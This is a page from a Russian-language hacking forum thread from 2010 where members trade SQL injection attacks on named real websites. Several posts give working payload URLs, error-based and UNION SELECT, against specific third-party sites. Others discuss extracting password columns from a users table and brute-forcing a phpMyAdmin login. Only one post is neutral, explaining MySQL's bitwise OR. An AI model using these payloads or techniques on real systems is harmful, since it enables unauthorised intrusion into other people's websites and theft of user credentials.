Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 713 of 1207
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    админку даже не искал, это уже не мое дело )
    проскан сайт (IntelliTamper,DirBuster, ArxScanSite...)
     
    _________________________
    #14241 Konqi, 22 Jul 2010
    1 person likes this.
  2. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Konqi
    А доступа к системным таблицам нету, как я понимаю, или я не прав?
     
    #14242 auth_root, 22 Jul 2010
  3. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Yetisports
    http://banken.ruilen.nl/random.php?catid=473
    Тут блайнд, 4-я ветка
    database: admin_ruilen
     
    #14243 AKYLA, 22 Jul 2010
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects
    а остальные(не дефолтные) таблицы нужно брутить
     
    _________________________
    #14244 Konqi, 22 Jul 2010
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Зачем крутить как blind, если можно добиться вывода?
     
    #14245 mailbrush, 22 Jul 2010
  6. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    AKYLA

    Code:
    http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),rand(0)|0)+having+avg(0)--+
    ололо ) думаем ребята )
     
    #14246 Dare, 22 Jul 2010
    1 person likes this.
  7. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Ну вообще да, можно вывести и так
     
    #14247 AKYLA, 22 Jul 2010
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Эм... А разница? https://forum.antichat.ru/showpost.php?p=2262240&postcount=14459

    Ах да, я нашёл в чем разница.
    Твой способ обрезает часть версии.
     
    #14248 mailbrush, 22 Jul 2010
  9. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Что где обрезанно? О_О что то я вас не понимаю молодой человек :D Раскрути ее своим запросом, вот тебе и разница
    PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.
     
    #14249 Dare, 22 Jul 2010
    Last edited: 22 Jul 2010
  10. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Объясните "что делает" эта запись rand(0)|0 ?? ну в смысле, для чего нужна вертикальная черта?
     
    #14250 IMMORTAL_S, 22 Jul 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Как-то так
     
    _________________________
    #14251 Konqi, 22 Jul 2010
  12. Yetisports

    Yetisports Banned

    Joined:
    11 Jul 2010
    Messages:
    147
    Likes Received:
    12
    Reputations:
    17
    почему не показать номер?

    http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

    http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
     
    #14252 Yetisports, 22 Jul 2010
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5

    =\

    https://forum.antichat.ru/showthread.php?p=2254732
     
    _________________________
    #14253 Konqi, 22 Jul 2010
    1 person likes this.
  14. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Спасибо конечно.. про rand я знаю ;) а вот для чего |0 непонял :)
     
    #14254 IMMORTAL_S, 22 Jul 2010
  15. bogdan

    bogdan Banned

    Joined:
    25 Jun 2010
    Messages:
    17
    Likes Received:
    6
    Reputations:
    0
    есть таблица users

    table_rows - 6

    есть колонки name,pass

    когда делаю запрос union+select+......version()+from+users то все нормально

    а запрос union+select+......pass+from+users ничего не выдает

    что посоветуете?
     
    #14255 bogdan, 22 Jul 2010
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Это операция Побитового "ИЛИ".

    Пример:

    Code:
    mysql> SELECT 29 | 15;
+---------+
| 29 | 15 |
+---------+
|      31 |
+---------+
1 row in set (0.00 sec)

mysql> SELECT 5|9;
+-----+
| 5|9 |
+-----+
|  13 |
+-----+
1 row in set (0.01 sec)

mysql> SELECT 2|96;
+------+
| 2|96 |
+------+
|   98 |
+------+
1 row in set (0.00 sec)

mysql> SELECT 7|5;
+-----+
| 7|5 |
+-----+
|   7 |
+-----+
1 row in set (0.00 sec)
    Можешь сверить по калькулятору(кнопка OR).
     
    #14256 Ins3t, 22 Jul 2010
    1 person likes this.
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Возможно луна в другой фазе.

    Code:
    UNION SELECT ...DATABASE() FROM USERS
    Code:
    UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users'
    Вполне вероятно, что базы разные.
     
    #14257 Ins3t, 22 Jul 2010
    1 person likes this.
  18. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Нашел SQL-Inj

    Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
     
    #14258 Anexroid, 22 Jul 2010
    Last edited: 22 Jul 2010
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить.
    2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.
     
    #14259 попугай, 22 Jul 2010
    1 person likes this.
  20. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Да, нашел вход в phpmyadmin. Имя пользователя знаю.
    Авторизация через .htaccess

    Вопрос номер 2:
    При помощи чего брутить?
     
    #14260 Anexroid, 22 Jul 2010
(You must log in or sign up to post here.)
Page 713 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.